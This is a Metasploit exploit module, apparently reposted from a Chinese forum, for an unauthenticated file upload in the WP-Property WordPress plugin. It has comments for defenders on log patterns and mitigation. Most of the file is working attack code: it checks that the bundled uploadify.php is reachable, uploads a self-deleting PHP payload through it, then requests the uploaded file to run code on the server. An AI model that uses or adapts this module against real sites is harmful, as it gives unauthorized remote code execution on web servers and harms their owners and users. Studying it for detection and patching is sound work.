WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

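# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (<= 1.35.0, per the module description).
#
# Root cause as exercised here: the plugin ships
# third-party/uploadify/uploadify.php, which is reachable without
# authentication and takes a multipart request carrying a `Filedata` file
# part and a caller-supplied `folder` field. The module sends a `.php` file
# name and then requests the path the uploader returns.
#
# Notes for defenders:
# * Log pattern: a POST to
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#   followed by a GET for a `.php` file named with five random letters.
# * The payload is generated with :unlink_self, so the uploaded file is
#   presumably gone after it runs; rely on web/access logs rather than on
#   finding the file on disk.
# * Mitigation: update WP-Property past 1.35.0, remove or deny direct access
#   to the bundled uploadify.php, and disable PHP execution in directories
#   that accept uploads.
#
# This listing was restored from a paste that had noise characters injected
# into it (including a mangled `::PhpEXE` mixin name and a missing `[` after
# 'Author'); the logic is unchanged.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata, targets and the TARGETURI option.
  #
  # @param info [Hash] metadata overrides merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploader script.
  #
  # The only evidence used is an HTTP 200 on uploadify.php. The plugin
  # version is never read, so "Appears" means "the script is reachable", not
  # "the installed version is confirmed vulnerable".
  #
  # @return [Exploit::CheckCode] Unknown when there is no response or the
  #   status is not 200, Appears otherwise
  def check
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads the PHP payload through uploadify.php and requests it.
  #
  # Flow: build a multipart body (`Filedata` + `folder`), POST it to the
  # uploader, require a 200 whose body mentions the generated file name, then
  # GET the path taken from that response body.
  #
  # @return [void]
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    # Five random letters plus ".php"; this is the name that shows up in logs.
    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops a CRLF that sits at the start of a line directly before a
    # `--_Part_` boundary marker in the serialized message.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    # The uploader is expected to echo the stored file's path in its body.
    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The response body is used verbatim as the request path.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end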

不要问我这写的是什么 怎么利用 我是说msf.